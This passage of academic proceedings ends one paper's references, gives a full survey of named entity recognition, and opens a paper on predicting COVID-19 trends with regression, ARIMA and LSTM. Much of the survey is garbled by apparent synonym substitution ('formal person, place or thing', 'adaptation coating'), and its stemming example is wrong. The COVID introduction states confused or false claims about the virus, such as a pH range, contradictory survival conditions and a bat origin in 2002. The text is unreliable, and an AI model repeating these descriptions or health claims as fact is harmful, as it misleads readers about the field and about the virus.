21. Casalino, G., Castellano, G., Castiello, C., Pasquadibisceglie, V., Zaza, G. (2019). A fuzzy
rule-based decision support system for cardiovascular risk assessment. In R. Fullér, S. Giove,
F. Masulli (Eds.), Fuzzy logic and applications, (pp. 97–108)
22. Mencar, C., Castellano, G., Fanelli, A. M. (2005). Some fundamental interpretability issues in
fuzzy modeling. In EUSFLAT Conference, pp. 100–105.
23. Kerr-Wilson, J., & Pedrycz, W. (2020). Generating a hierarchical fuzzy rule-based model.
Fuzzy Sets and Systems, 381, 124–139.
816 G. Zaza

24. Prokopowicz, P., Mikolajewski, D., Mikolajewska, E., & Tyburek, K. (2017). Modeling
trends in the hierarchical fuzzy system for multi-criteria evaluation of medical data. In
EUSFLAT/IWIFSGN.
25. Alrashoud, M. (2019). Hierarchical fuzzy inference system for diagnosing dengue disease.
In 2019 IEEE International Conference on Multimedia & Expo Workshops (ICMEW), (pp.
31–36).
26. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Contact-less real-time
monitoring of cardiovascular risk using video imaging and fuzzy inference rules. Information,
10(1), 9.
27. Pasquadibisceglie, V., Zaza, G., & Castellano, G. (2018). A personal healthcare system for
contact-less estimation of cardiovascular parameters. In AEIT International Annual Confer-
ence. IEEE, 2018, 1–6.
28. Kazemi, V., & Sullivan, J. (2014). One millisecond face alignment with an ensemble of regres-
sion trees. In 2014 IEEE Conference on Computer Vision and Pattern Recognition, pp. 1867–
1874
29. Speake, T., & Mersereau, R. (1981). A note on the use of windows for two-dimensional fir
filter design. IEEE Transactions on Acoustics, Speech, and Signal Processing, 29(1), 125–127.
30. De Haan, G., & Jeanne, V. (2013). Robust pulse rate from chrominance-based rppg. IEEE
Transactions on Biomedical Engineering, 60(10), 2878–2886.
31. Kong, L. K. et al. (2013). Non-contact detection of oxygen saturation based on visible light
imaging device using ambient light. Optics express, 21 15, 17464–71
32. Castellano, G., Castiello, C., Pasquadibisceglie, V., & Zaza, G. (2017). Fisdet: Fuzzy inference
system development tool. International Journal of Computational Intelligence Systems, 10(1),
13–22.
33. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Evaluating end-user
perception towards a cardiac self-care monitoring process. In International Conference on
Wireless Mobile Communication and Healthcare (pp. 43–59). Springer.s
34. Casalino, G., Castellano, G., & Zaza, G. (2020). A mhealth solution for contact-less self-
monitoring of blood oxygen saturation. In IEEE Symposium on Computers and Communica-
tions (ISCC). IEEE, 2020, 1–7.
35. Casalino, G., Grassi, R., Iannotta, M., Pasquadibisceglie, V., & Zaza, G. (2020). A hierarchical
fuzzy system for risk assessment of cardiovascular disease. In 2020 IEEE Conference on
Evolving and Adaptive Intelligent Systems (EAIS). IEEE (pp. 1–7)
36. Mencar, C., Castellano, G., & Fanelli, A. M. (2005). Deriving prediction intervals for neuro-
fuzzy networks. Mathematical and Computer Modelling, 42(7–8), 719–726.
Named Entity Recognition in Natural
Language Processing: A Systematic
Review

Abhishek Sharma, Amrita, Sudeshna Chakraborty, and Shivam Kumar

Abstract The enormous growth and availability of data poses a great challenge
for extracting useful information from documents written in natural language. The
information extraction task has become a vital activity in all domains. The process
of identifying the names of organization, people, locations or other entities in text
is called named entity recognition (NER). It is the subtask and plays an important
part to discover and classify the names such as organization name, person name or
the location. This is one of the trending fields and most important step in the natural
language processing (NLP) for analysis of text. Research on NER changed a lot in the
recent decade. NER can consequently examine the entire articles and reveal the indi-
viduals, associations, and spots talked about in text. Knowing the applicable labels
for every single article help in naturally arranging the articles in all around charac-
terized progressive systems and endorse smooth content disclosure. The pretension
of this paper is to present survey on NER. The prime contribution of this research to
present state-of-the-art NER is systematically reviewed according to techniques used
in NER. This paper also provides tools, datasets, techniques, challenges and future
directions in the field of NER with the aim of providing researchers the substantial
knowledge for further work.

Keywords Named entity recognition · Information extraction · Natural language


processing · Survey · Systematic review

1 Introduction

Named entity recognition (NER) is presumably the initial step towards data extraction
that tries to find and characterize named elements in content into pre-characterized
classes, for example, the names of people, locations, organizations, areas, amounts,
fiscal qualities, rates, and so forth. NER is utilized in numerous fields in Natural

A. Sharma · Amrita (B) · S. Chakraborty · S. Kumar


Computer Science & Engineering, School of Engineering & Technology, Sharda University,
Greater Noida, Uttar Pradesh, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 817
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_66
818 A. Sharma et al.

Language Processing (NLP). NER not only acts as a standalone tool but also plays
a very important role in various NLP applications like speech recognition, chatbots,
sentiment analysis, text classification, automatic summarization etc.
The other name of NER is entity identification, entity extraction, and entity chunk-
ing. NER is the state of Artificial Intelligence system that works with about the
productivity of the human mind. The system is organized so that it is equipped for
discovering element components from raw information and can help to decide the
classification wherein the component has a place. The process of identifying and
classifying various types of data elements is known as the named entity (NE). The
idea of NE showed up in a situation of NLP application and is a long way from being
linguistically clear and settled.

1.1 Evolution of NER

The expression NE, broadly utilized in information extraction (IE), question answer-
ing or other characteristic language processing applications, was conceived in the
message understanding conferences (MUC) which impacted IE examine in the U.S.
in the 1990s. Around then, MUC concentrated on IE assignments where organized
data of organization exercises and barrier related exercises is extricated from unstruc-
tured content, for example, paper articles. Over the span of framework advancement,
individuals saw that it is imperative to perceive data. Separating these substances
was perceived as one of the significant sub-undertakings of IE. As this undertak-
ing is moderately free, it has been assessed independently in a few unique dialects,
for example Japanese, Chinese and Spanish in multilingual entity tracking venture.
There has been a few assessment based ventures for NE, as one of the undertakings
of Information Retrieval and Extraction Exercise (IREX) in Japan [IREX HP], and
as the mutual undertaking in CoNLL in 2002 furthermore, 2003 for four dialects,
English, German, Dutch and Spanish [CoNLL HP]. In the IREX venture, another
class artifact, for example, “Odyssey” as a book title or “Windows” as an item name,
was added to the first MUC classes. The NE task in MUC was acquired by the
ACE venture in the U.S., where 2 new classifications are included, Geographical and
Political Entities, for example, “France” or “New York” and facility, for example,
“Empire State Building” [1].
Petasis et al. [2] confined the significance of named components: “A NE is a formal
person, place or thing, filling in as a name for a person or thing". This limitation is
legitimized by the outstanding level of formal person, place or thing, spots or things
available in the corpus. “Named" constrained the endeavor to just those substances
for which one or various rigid designators presents to the referent. Rigid designator
described in appropriate names and common terms like organic species besides,
substances. Regardless of the distinctive explanation of NE’s, authorities have shown
up at normal concurrence on the sorts of NEs to see, the most part separate NEs into
two classes: regular NE’s and space explicit NE’s (e.g., proteins, synthetics, and
Named Entity Recognition in Natural Language Processing … 819

characteristics). Right now, principally center around conventional NE’s in English


language [3]. NER is an active research area in recent years. However, automated
NER and extraction systems are very popular research areas.

1.2 Motivations for Conducting This Survey

From the last two decades, various kinds of topics have pulled in critical consideration
such as Deep Learning (DL) because of their achievement in different areas. DL-
based NER approach with insignificant component building has been growing. In
recent years, an extensive number of studies implement deep learning techniques out
how NER progressively propelled the cutting edge execution. This pattern motivates
us to direct the study to survey the current state or the situation of deep learning
systems in the field of NER look into. By contrasting the decisions of DL designs,
our objective is to distinguish factors influencing NER execution just as problems
and challenges.
NER studies have been developing for a couple of decades. As far as we could
possibly know, there are not many surveys in this field up until now. Apparently the
most settled one was established by Nadeau and Sekine [1] in 2007. Marrero et al. [4]
summed up NER works from the points of view of false notions, difficulties, issues
and furthermore the open doors in the time of 2013.
The pretension of this paper is to present a survey of the various techniques trends
in NER. The remainder of the paper is as follows. The detailed insight of the related
background on the aforementioned study is presented in the next section. Section 3
provides the systematic literature review of related work. Section 4 provides the
challenges and future directions and finally conclusion is in Sect. 5.

2 Related Background

2.1 NER

It is presumably the initial step toward data extraction that tries to find and character-
ize named elements in content into pre-characterized classes, for example, the names
of people, locations, organizations, areas, amounts, fiscal qualities, rates, and so forth.
NER is utilized in numerous fields in NLP. NER acts as an autonomous tool as well
as plays a very important role in various NLP applications like speech recognition,
chatbots, sentiment analysis, text classification, automatic summarization etc.
820 A. Sharma et al.

2.2 NER Datasets

A tagged or the labeled corpus is the cluster of documents that includes interpretation
of single or might be more than single entity types. Prior to 2005, datasets were mostly
evolved by commenting on news stories with few element types, fitting for coarse-
grained NER undertakings. Starting there onwards, large amount of datasets were
generated which were based on the different types of content origin including various
kind of Wikipedia articles, discussion, and client produced content. The various kinds
of tag types turnsout to be significantly larger e.g., 89 in OntoNotes [5]. The various
progressing NER activities report their display on CoNLL03 and OntoNotes datasets.
The CoNLL [6] datasets comprise of newswire information in four European dialects
Spanish, Dutch, English and German and is labeled with four substance types (PER,
LOC, ORG, MISC). OntoNotes is an additionally testing corpus, containing three
dialects that don’t share contents: Arabic, Chinese and English and contains 18
NER types. GENIA [7] corpus is also used for the task of NER. OntoNotes has
an enormous number of labelled elements. The objective of the OntoNotes venture
was to comment on an enormous corpus, containing different classifications such as
various blogs and the different and more and more group of news with basic data
(linguistic structure and predicate contention structure) and shallow semantics (word
sense connected to a cosmology and coreference). The other corpus for the dataset
is MUC-6 [8] which also used for the task of NER. This corpus contains the 318
clarified Wall Street Journal articles, the scoring programming and the comparing
documentation utilized in the MUC-6 assessment. The importance of MUC-6 corpus
and MUC-6 Additional News Text is that it is used in the replication of assessment.

2.3 NER Tools

There are various tools available online for English text. Some of the tools which
can be used for NER are—(i) Natural Language Toolkit (NLTK) [9], (ii) Polyglot
[10], (iii) Stanford CoreNLP [11], (iv) LingPipe [12], (v) Allen NLP [13], and (vi)
ScispaCy [14].
The tool which can be used for NER is NLTK, which is open source library for the
Python programming language. It is the most commonly used platform if working
with human language data using Python. NLTK provides more than 50 corpora and
various lexical resources. NLTK also has libraries for the classification, tokenization,
lemmatization and chunking. It goes with a hands-on control that presents subjects
in computational morphological also as programming nuts and bolts for the Python
Languages because of it makes it reasonable for language experts who have not any
extraordinary data in programming, creators, researchers that are required to plunge
into the computational morphology.
The other tool which is in trend for NER is ScispaCy. ScispaCy is an open source
programming library for advanced NLP. The ScispaCy NER condition utilizes a
Named Entity Recognition in Natural Language Processing … 821

word inserting system utilizing a sub-word highlights and Bloom embedding and 1D
Convolutional Neural Network (CNN). Bloom embedding is like a word installing
and more space streamlined representation. It gives each word and separate repre-
sentation for each particular setting it is in. Whereas 1D CNN is applied over the
information content to group a sentence/word into a group of predetermined cate-
gories.
There are various steps in NER like tokenization, lemmatization, Part-of-Speech
(POS) tagging, and chunking which can be done by using any of these tools. The
steps are:
(i) Tokenization: The basic tokenizer split the text into sentence and sentence
into tokens. For example, the sentence “he is playing cricket" is split into tokens as
[‘he’, ‘is’, ‘playing’, ‘cricket’].
(ii) Lemmatization: Lemmatization is the process in which a word converts to
its root form like caring to care, playing to play etc. Lemmatization helps to identify
the root form or the base form of the word whereas stemming just cut off the ing part
from the word which makes a huge difference. Stem might not be a real or actual
word but lemma always be a real word. In Lemmatization, ‘Caring’ converts into
‘care’ whereas in stemming ‘Caring’ converts into ‘car’.
(iii) POS Tagging: It is used to read the text language and assign some token to
each and every word. Tagging is a sort of grouping that might be characterized as
the programmed task of depiction to the tokens. The descriptor is called tag, which
may speak to one of the grammatical features, semantic data, etc. For example, the
sentence “he is playing cricket" is tagged as [(‘he’, ‘PRP’), (‘is’, ‘VBZ’), (‘playing’,
‘VBG’), (‘cricket’, ‘NN’)].
(iv) Chunking: Chunking is also known as chunk extraction and shallow parsing.
It is the method of extracting the meaningful short phrases from the sentence which is
tagged with POS. It adds the structure in the given sentence which is tagged with the
POS. There is maximum one level between the roots and leaves in shallow parsing
or chunking on the other hand deep parsing consists of more than one level.
The primary usage of chunking is to make a group of noun phrases. The parts
of speech are combined with regular expressions. There are no predefined rules for
chunking but rules can be made as per the need or the requirements.

2.4 Techniques for NER

The capacity to distinguish the beforehand obscure elements is a significant piece of


NER and Classification. This capacity pivots upon acknowledgment and grouping
rules brought about by various highlights related with positive and negative models. A
large portion of the prior examinations dependent on handmade principles, presently
supervised machine learning as a technique to naturally actuate rule-based systems or
succession labeling algorithms beginning from an assortment of preparing models
[1]. NER and classification techniques [15] are categorized into three types—(i)
Rule-based NER, (ii) Learning-based NER, and (iii) Hybrid NER.
822 A. Sharma et al.

2.4.1 Rule-Based Technique

Several earlier IE and NER systems are based on hand-crafted rules [1]. It employs
domain specific features to identify and classify NE using syntactic-lexical pat-
terns and series of hand-crafted grammatical rules by computational linguists. These
rules work well to extract IE that follows specific patterns. The main drawbacks are
domain-specific and time-consuming due to manual construction of the rules.

2.4.2 Learning-Based Technique

Learning-based technique can be classified into following three types:


(i) Supervised Learning: Supervised Learning is the learning in which the model is
trained using the labelled datasets. Labeled datasets are those datasets which contain
both input and output parameters. A learning algorithm at that point trains a model to
generate a prediction for the response to new data or the test dataset. The examples of
supervised learning are Regression and Classification. The output may be categorical
or the numeric. Regression is those problems in which the output variable is real
value, example “dollars" or “weight". Whereas, classification is those problems in
which the output variable is category, for example “black" or “blue" and “disease" or
“no disease". Few supervised learning algorithms are—Naive Bayes classification,
Support vector machines, Decision Trees, Linear Regression, and Ordinary Least
Squares Regression.
(ii) Unsupervised Learning: Unsupervised learning is the learning technique in
which the supervision of the model is not needed. In unsupervised learning, the
user allows the model to work itself to discover the information. It mainly deals
with the unlabeled data. With unsupervised learning, users can perform progres-
sively complex tasks when contrasted with the supervised learning which manages
the tagged information. Unsupervised learning can be increasingly unpredictable.
Using unsupervised learning, users can find any unknown patterns in the data. Get-
ting unlabeled data from a computer is easier than the labeled data. This is called
unsupervised learning because there is no teacher for training the data and also there
is no correct answer. Clustering and association are the techniques of unsupervised
learning.
(iii) Semi-supervised Learning: Semi-supervised learning technique is the combi-
nation of the limited quantity of labeled data and the enormous measure of unlabeled
data. Semi-supervised learning is somewhere good technique to try because labeled
data is an expensive and also takes more time.
Named Entity Recognition in Natural Language Processing … 823

2.4.3 Hybrid Technique

The hybrid technique combines learning-based technique with rule-based technique.


It has advantages of both techniques. The final results are obtained by combining the
results of two or more techniques. The systems based on this technique are found
more accurate than individual technique based system.

3 A Systematic Literature Review of Related Work

This section provides the state-of-the-art various NER.


Lin et al. [16] presented a connected character-level description, linguistic word
description, and word-level description for the making of complete word represen-
tation. Peters et al. [17] suggested TagLcoM, a language system expanded gathering
tagger which deals with the both pre-trained word installing and duplex language
system embedding for each token inside the input succession for the plan of tagging
task.
A unified learning algorithm and neural network architecture is proposed by Col-
lobert et al. [18]. It is single system performing various NLP tasks. It is used as basis
for developing freely available tagging system with minimal computation require-
ments and good performance. A neural model to recognize embedded elements pro-
gressively stacking level NER layers until no outer components are removed pre-
sented by Ju et al. [19]. Every level NER layer utilizes bidirectional LSTM to catch
the context which is in arrangement. The model joined the output of the LSTM layer
inside the present level NER layer to develop new portrayals for the found elements
at that point and takes care of them into the following level NER layer.
A multiple tasks joint model is proposed by Yang et al. [20] which discover
language-explicit uniformities, together prepared for POS labeling, Chunking, and
different NER steps. Rei [21] discovered that by involving an unsupervised lan-
guage displaying objective for the training procedure, the arrangement naming model
accomplishes dependable execution enhancement. Nadeau et al. [22] presented a sys-
tem for named entity skepticism intent by using unsupervised methods. This model
merges entity prying and disambiguation dependent on straightforward yet very much
efficient heuristics.
Zhang and Elhadad [23] in their research presents an unsupervised learning
method to excerpt the named substance from the biomedical content. Rather than
handling, their system retreats to terminologies, corpus measurements and shallow
syntactic information. Experiments on two popular biomedical data sets determine
the performance of their unsupervised learning method. Biomedical NER applica-
tions show a pattern towards semi-supervised methods since they offer progressively
broad and free corpus arrangements. The application of semi-supervised systems in
the field of chemical NER may improve the performance since it considers a huge
number of unannotated documents and enables the improvement of models without
depending on the training corpora.
824 A. Sharma et al.

Däniken and Cieliebak [24] broadened crafted by Yang’s to allow joint getting
ready on easygoing corpus, and to coordinate the sentence level component portrayal.
Their system got the second spot at the WNUT 2017 shared errand for NER. Zhao
et al. [25] have proposed a perform multiple tasks system with the changing of area,
where the whole association coating is adjusted to different kinds of datasets, and
the conditional random field (CRF) [26] attributes has been handled autonomously.
A critical good situation of Zhao’s model is the cases through discrete dissemina-
tion and improper adjusted explanation guidance are passed out simply in the data
determination process. Lin and Lu [27] proposed a refining system for NER by pre-
senting a three neural adaptation coating: initial one is word adaptation coating and
the another is sentence adaptation coating and the latter is yield adaptation coating.
Various NER models have been developed by using MLP and Softmax as the label
decoder. Softmax is utilized as label decoder to anticipate games in chess games as
a specific NER task in [28]. It takes both contributions from entities and from chess
board (9 × 9 squares with 40 bits of 14 explicit sorts) and predicts 21 named elements
explicit to this game. Content representations and game state embeddings are both
taken care as a softmax layer for the anticipation of named entities utilizing the BIO
label scheme.
Goyal et al. [15] reviewed improvements and advances made in NER however they
avoid ongoing advances of deep learning methods. The short outline recent progress
in NER on portrayls of words in sentence is presented by Yadav and Bethard [29].
This overview focused on the scattered descriptions for input and don’t investigate
the setting encoder and label adapters. The progressing pattern of implementing deep
learning is the task of NER.
An attention tool to progressively choose the amount of data to be utilized from a
character-or word-level section from beginning to end of NER model is executed by
Rei et al. [30]. Zukov-Gregoric et al. [31] learned about the self-thought part in NER,
where the loads are subject to a solitary grouping (instead of association between
two arrangements).
Xu et al. [32] presented a consideration dependent neural NER configuration to
utilize document level overall information particularly, the report-level information
is acquired from records introduced by utilizing the pre-prepared bilateral or duplex
language model with neural deliberation. A powerful and the versatile co-attention
network in the tweets is utilized by Zhang et al. [33]. This versatile co-attention net-
work is a multi-secluded model utilizing co-consideration process. Co-consideration
incorporates visible consideration and printed regard for getting the semantic col-
laboration between different methods.
Named Entity Recognition in Natural Language Processing … 825

4 Challenges and Future Directions

4.1 Challenges

(i) Ambiguity and Abbreviations: One of the significant difficulties in recognizing


named substances is language. Distinguishing words which can have numerous
implications or words that can be a piece of various sentences. Another signifi-
cant challenge is grouping comparative words from writings. Numerous words
or sentences can be written in various structures. Words can be curtailed for sim-
plicity of composing and comprehension. Words which will some of the time
require some name for distinguishing proof is another significant challenge.
(ii) Data Annotation: Supervised NER methods require a huge amount of annotated
data during training. To work on huge amount of annotated data is very expensive
and also very time consuming. Thus, it’s a major test for some particular areas
as space specialists are required to play out the explanation undertakings.
(iii) Quality and Consistency are also concerns because of the ambiguity of the lan-
guage. Same name may be annotated with different kinds like place, organization
name, person name etc. Suppose there is a sentence “U.S. President stayed in
the Whitehouse". Whitehouse can be an organization name like Whitehouse Pvt.
Ltd and whitehouse also the official residence of the U.S. President. So it cre-
ates confusion in the entity boundaries. So, Quality also plays an important role
in NER. Consistency additionally assumes a significant job on account of the
irregularity in information explanation, it might be possible that model trained
on some dataset would not perform the task appropriately with the other dataset
even if the documents in the both dataset belong from the same domain.
(iv) Foreign words also play a major role in this field. There are various words which
are not heard by lots of people and words which are used by people frequently
on a daily basis is another major challenge in this field.
(v) Vowels can also be the challenge because it makes a lot of difference when we
verbally use the word and when we write the words. Both words sound similar
but both are different.

4.2 Future Directions

As the advancement in various modeling languages there should be more attention


provided to the NER from the researchers. NER is generally viewed as a pre-handling
to downward utilizations which implies a specific task of NER is characterized as
per demand of downward applications. Some bearing for additional analysis in NER
are:
(i) Fine-grained NER and boundary identification: Most of the studies concentrate
just on spotlights on the coarse-grained NER in the general space, so there should
826 A. Sharma et al.

be more research on the fine-grained in NER in the particular area regions. There
are numerous troubles in fine-grained NER. One of the tests in fine-grained
NER is the essentially expanding or bringing up in the NE types and in this
way trouble announced by conceding a named substance to have various NE
types. This includes an arrival of the fundamental NER approaches where as
far as possible, along these lines the sorts are recognized simultaneously. It is
sufficient to consider portraying the named substance limit distinguishing proof
as a committed endeavor for the ID of NE limits, while dismissing NE types.
Separation of boundary identification proof and the NE type characterization
enables typical and fiery answers for the cutoff ID which will be shared across
different sorts of areas, and dedicated region explicit techniques for the NE kind
of classification.
(ii) NER with respect to Informal Text with Auxiliary Assets: The performance based
on the Deep Learning NER concerning informal content or client delivered con-
tent remains low so more research is required around there. The assistant assets
are every now and again required for the better comprehension of client created
content. The principle work is the way to get coordinating helper assets for a
NER work on client created content or specific area and the way to reasonably
integrate or interconnect the auxiliary assets in the task of NER.
(iii) Flexibility of NER: The creation of NER models progressively scalable is as yet
a challenging task. The solution is still needed to optimize rapidly increasing
the development of limiting factor when the size of data becomes enlarged [34].
Numerous NER models have just accomplished a better than average execution
however with the cost of huge figuring power. For example ELMo depiction
designate to every word with a 3 × 1024-dimensional vector and the time taking
by model for training was 5 weeks on 32 GPUs [35]. Googles BERT were trained
on 64 cloud TPUs. To balancing the complexity and the creating approaches
would be a guaranteeing course.

5 Conclusion

The named entity recognition (NER) field has been flourishing in the recent decades.
Named entity tasks play a very important role in the natural language technologies.
NER is incessantly enriching due to its major contribution in numerous natural lan-
guage processing (NLP) applications. The aim of this research is to survey the recent
studies on the NER solutions which help the researchers to build a strong base in
this field. This research will give insight to the researchers about evolution of NER,
datasets, tools, techniques that can be employed in NER. It also helps to gain insight
about Challenges in NER for novice researchers. In addition, a review of rule-based,
learning based and hybrid NER systems has been presented. After viewing most of
the paper we found that when supervised learning method is utilized there is the
accessibility of an enormous collection of annotated data and when unsupervised
learning method is used the data is unannotated. Various recent studies in the field of
Named Entity Recognition in Natural Language Processing … 827

NLP discovered many types of unsupervised and semi-supervised techniques which


allow the quick organization for various component types without the need of anno-
tated corpus. Finally, future directions are also presented to facilitate researchers to
improve NER techniques and guide them to progress in this research field.

References

1. Nadeau, D., & Sekine, S. (2007). A survey of named entity recognition and classification.
Lingvisticae Investigationes, 30(1), 3–26.
2. Petasis, G., Cucchiarelli, A., Velardi, P., Paliouras, G., Karkaletsis, V., & Spyropoulos, C.
D. (2000). Automatic adaptation of proper noun dictionaries through cooperation of machine
learning and probabilistic methods. Proceedings of SIGIR, 128–135.
3. Li, J., Sun, A., Han, J., & Li, C. (2018). A survey on deep learning for named entity recognition.
IEEE Transactions On Knowledge And Data Engineering, 20.
4. Marrero, M., Urbano, J., Sánchez-Cuadrado, S., Morato, J., & Gómez-Berbís, J. M. (2013).
Named entity recognition: Fallacies, challenges and opportunities. Computer Standards &
Interfaces, 35, 482–489.
5. Weischedel, R., Hovy, E., Marcus, M., Palmer, M., Belvin, R., Pradhan, S., Ramshaw, L., &
Xue, N. (2011). OntoNotes: A large training corpus for enhanced processing. In Handbook of
natural language Processing and machine translation: DARPA global autonomous language
exploitation. Springer.
6. Sang, E. F.T . K. (2002). Introduction to the conll-2002 shared task: Language-independent
named entity recognition. In Proceedings of the 6th Conference on Natural Language Learning.
Stroudsburg, PA, USA. Association for Computational Linguistics (Vol. 31, pp. 1–4).
7. Kim, J. D., & Ohta, T. (2003). GENIA corpus-a semantically annotated corpus for bio-
textmining (Vol. 19).
8. Grishman, R., & Sundheim, B. (1996). Message understanding conference-6: A brief history.
In Proceedings of the 16th Conference on Computational Linguistics, COLING (Vol. 1, pp.
466–471).
9. Bird, S., Loper, E., & Klein, E. (2009). Natural language processing with python (Vol. 36, pp.
767–771). O’Reilly Media Inc.
10. Al-Rfou, R., Kulkarni, V., & Perozzi, B. (2014). POLYGLOT-NER: Massive multilingual named
entity recognition (Vol. 1).
11. Manning, C., Surdeanu, M., & Bauer, J. (2014). The Stanford CoreNLP natural language
processing toolkit. Proceedings of 52nd Annual Meeting of the Association for Computational
Linguistics: System Demonstrations (pp. 55–60).
12. Kang, Y., Cai, Z., Tan, C.-W., Huang, Q., & Liu, H. (2020). Natural language processing (NLP)
in management research: A literature review. Journal of Management Analytics, 7(2), 139–172.
13. Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M.,
& Zettlemoyer, L. (2017). AllenNLP: A deep semantic natural language processing platform.
In Proceedings of Workshop for NLP Open Source Software (NLP-OSS), Technical report (pp.
1–6,).
14. Neumann, M., & King, D. (2019). ScispaCy: Fast and robust models for biomedical natural
language processing. In Proceedings of the BioNLP workshop, 319–327.
15. Goyal, A., Gupta, V., & Kumar, M. (2018). Recent named entity recognition and classification
techniques: A systematic review. Computer Science Review, 29, 21–43.
16. Lin, B. Y., Xu, F., Luo, Z., & Zhu, K. (2017). Multi-channel bilstm-crf model for emerging
named entity recognition in social media. In Proceedings of the 3rd Workshop on Noisy User-
generated Text (pp. 160–165).
17. Peters, M. E., Ammar, W., Bhagavatula, C., & Power, R. (2017). Semisupervised sequence
tagging with bidirectional language models. In Proceedings of ACL (pp. 1756–1765).
828 A. Sharma et al.

18. Collobert, R., Weston, J., Bottou, L., Karlen, M., Kavukcuoglu, K., & Kuksa, P. (2011). Natural
language processing (almost) from scratch. Journal of Machine Learning Research, 12, 2493–
2537.
19. Ju, M., Miwa, M., & Ananiadou, S. (2018). A neural layered model for nested named entity
recognition. Proceedings of NAACL-HLT, 1, 1446–1459.
20. Yang, Z., Salakhutdinov, R., & Cohen, W. (2016). Multi-task cross-lingual sequence tagging
from scratch. arXiv. 2.
21. Rei, M. (2017). Semi-supervised multitask learning for sequence labeling. Proceedings of ACL
(pp. 2121–2130).
22. Nadeau, D., Turney, P. D., & Matwin, S. (2006). Unsupervised named entity recognition:
Generating gazetteers and resolving ambiguity. In Proceedings of the Canadian Society for
Computational Studies of Intelligence (pp. 266–277). Springer.
23. Zhang, S., & Elhadad, N. (2013). Unsupervised biomedical named entity recognition: Experi-
ments with clinical and biological texts. Journal of Biomedical Information, 46, 1088–1098.
24. Däniken, P. V., & Cieliebak, M. (2017)T. ransfer learning and sentence level features for named
entity recognition on tweets. In Proceedings of the 3rd Workshop on Noisy User-generated Text
(pp. 166–171).
25. Zhao, H., Yang, Y., Zhang, Q., & Si, L. (2018). Improve neural entity recognition via multi-task
data selection and constrained decoding. NAACL-HLT, 2, 346–351.
26. Sutton, C., McCallum, A., & Rohanimanesh, K. (2007). Dynamic conditional random fields:
Factorized probabilistic models for labeling and segmenting sequence data. Journal of Machine
Learning Research, 8, 693–723.
27. Lin, B. Y., & Lu, W. (2018). Neural adaptation layers for cross-domain named entity recogni-
tion. Proceedings of AAAI, 12, 2012–2022.
28. Tomori, S., Ninomiya, T., & Mori, S. (2016). Domain specific named entity recognition refer-
ring to the real world by deep neural networks. Proceedings of ACL, 2, 236–242.
29. Yadav, V., & Bethard, S. (2018). A survey on recent advances in named entity recognition from
deep learning models. In Proceedings of COLING (pp. 2145–2158).
30. Rei, M., Crichton, G. K., & Pyysalo, S. (2016). Attending to characters in neural sequence
labeling models. In Proceedings of COLING (pp. 309–318).
31. Zukov-Gregoric, A., Bachrach, Y., Minkovsky, P., Coope, S., & Maksak, B. (2017). Neural
named entity recognition using a selfattention mechanism. In Proceedings of ICTAI (pp. 652–
656).
32. Xu, G., Wang, C., & He, X. (2018). Improving clinical named entity recognition with global
neural attention. In Proceedings of APWeb-WAIM (pp. 264–279).
33. Zhang, Q., Fu, J., Liu, X., & Huang, X. (2018). Adaptive co-attention network for named entity
recognition in tweets. In AAAI.
34. Batmaz, Z., Yurekli, A., Bilge, A., & Kaleli, C. (2018). A review on deep learning for recom-
mender systems: Challenges and remedies. Artificial Intelligence Review, 1–37.
35. Akbik, A., Blythe, D., & Vollgraf, R. (2018). Contextual string embeddings for sequence
labeling. In Proceedings of COLING (pp. 1638–1649).
Assessing Spatiotemporal Transmission
Dynamics of COVID-19 Outbreak Using
AI Analytics

Mayuri Gupta, Yash Kumar Singhal, and Adwitiya Sinha

Abstract Coronavirus is a respiratory disease which is produced by the virus SARS-


CoV-2. The symptoms of the coronavirus include flu, sore throat, common cold,
cough, fatigue, and shortness of oxygen in the body. COVID-19 is a pandemic that
spreads across the world. In this paper, we presented a model to analyze the trend of
the coronavirus. We used artificial intelligence analytics including linear regression,
support vector machine, auto regressive integrated moving average, and long short-
term memory methods on the real data of coronavirus by using Python 3.0 (Jupyter
Notebook). The prediction shows cumulated trend prediction of confirmed cases.
Linear regression and ARIMA model give the best results with maximum accuracy
(98% and 99.87% respectively) and performed better with existing to counter parts.
Later, we will develop specialized deep learning models, including multi-perceptron
and autoencoders for trend prediction with better accuracy.

Keywords Coronavirus · Artificial intelligence · Linear regression · Predictive


analysis · ARIMA · LSTM · COVID-19 · Disease outbreak

1 Introduction

Coronavirus is covered by a secured layer of fat which is observed to have changing


genetic code. The virus follows a decaying procedure and is impossible to be
destroyed easily. The virus has a less resistance comparatively, and hence, detergent
and soap can cut the layer of fat, thereby destroying the virus eventually [1]. The
coronavirus particles are highly transmissible and can stay consistent in cold climate
and air conditioning systems in vehicles and houses. The coronavirus requires mois-
ture to remain alive and particularly at night or dark along with a warm, dehumidifier,

M. Gupta · A. Sinha (B)


Department of Computer Science & Engineering and Information Technology, Jaypee Institute of
Information and Technology, Noida-62, Uttar Pradesh, India
Y. K. Singhal
Department of Computer Science and Engineering, Indian Institute of Technology, Jodhpur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 829
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_67
830 M. Gupta et al.

dry, and the sunny climate tends to deteriorate it. The coronavirus PH lies between
5.5 and 8.5. It is spread by the virus SARS-CoV-2. It was accepted that it is a microor-
ganism found in bats in 2002; however, it has begun spreading in different creatures
like cats and people. First, it was found in southern China in 2002. Coronavirus
started from Wuhan, China in December 2019. Later, it expanded to the whole of
China and, subsequently, the whole world. In January 2020, WHO announced coron-
avirus as a Public Health Emergency of International Concern (PHEIC), and later in
March 2020, WHO announced it was pandemic, and thus, lockdown started in many
countries. Due to the coronavirus, people with weak immunity are mostly affected,
especially infants, senior citizens, and people with heart disease and diabetes. In our
research work, we have used artificial intelligence (AI) techniques, including linear
regression (LR), support vector machine (SVM), long short-term memory (LSTM),
and auto-regressive integrated moving average (ARIMA) to predict the trend of
COVID-19.

2 Literature Survey

There are various works and research had been performed on coronavirus predic-
tion by using machine learning (ML) algorithms and deep learning (DL), etc. In a
